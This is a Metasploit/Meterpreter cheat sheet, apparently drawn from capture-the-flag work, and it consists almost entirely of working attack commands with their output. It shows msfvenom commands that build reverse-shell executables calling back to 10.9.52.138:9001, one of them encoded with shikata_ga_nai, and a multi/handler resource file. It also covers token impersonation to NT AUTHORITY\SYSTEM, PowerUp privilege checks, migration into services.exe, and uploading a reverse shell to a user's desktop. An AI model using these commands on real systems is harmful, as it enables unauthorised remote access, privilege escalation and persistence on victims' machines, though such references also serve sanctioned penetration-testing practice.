Skip to content

Metasploit / Meterpreter

Modules

List of modules :

  • espia :
  • incognito : Allow you to impersonate user tokens.
  • lanattacks
  • powershell : Enable powershell (interactive shell, single command, ...).
  • python
  • stdapi
  • winpmem
  • extapi
  • kiwi
  • peinjector
  • priv
  • sniffer
  • unhook

Incognito

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[...]
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Powershell

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]

Msfvenom

List payload : msfvenom --list payload

# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
    -f exe -o shell.exe

# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai \
    LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe

# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
    -f elf -o shell.bin
  • staged : 2 parts, a listener, then the reverse shell is send to the listener.
  • stageless : Reverse shell is directly inside the payload.

Ressource file

File msf.rc :

use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j

Command : msfconsole -r msf.rc

Migrate on process

More information about the migrate command.

Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions.

meterpreter > ps | grep services
Filtering on 'services'

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 996 to 668...
[*] Migration completed successfully.

Search for files

meterpreter > search -f shell.exe
Found 1 result...
=================

Path                              Size (bytes)  Modified (UTC)
----                              ------------  --------------
c:\Users\bruce\Desktop\shell.exe  73802         2021-12-11 12:20:17 +0100

Upload / Download

meterpreter > download shell.exe
[*] Downloading: shell.exe -> /home/.../alfred/shell.exe
[*] Downloaded 72.07 KiB of 72.07 KiB (100.0%): shell.exe -> /home/.../alfred/shell.exe
[*] download   : shell.exe -> /home/.../alfred/shell.exe

meterpreter > upload shell.exe 'c:\Users\bruce\Desktop\reverse.exe'
[*] uploading  : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] uploaded   : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
Back to top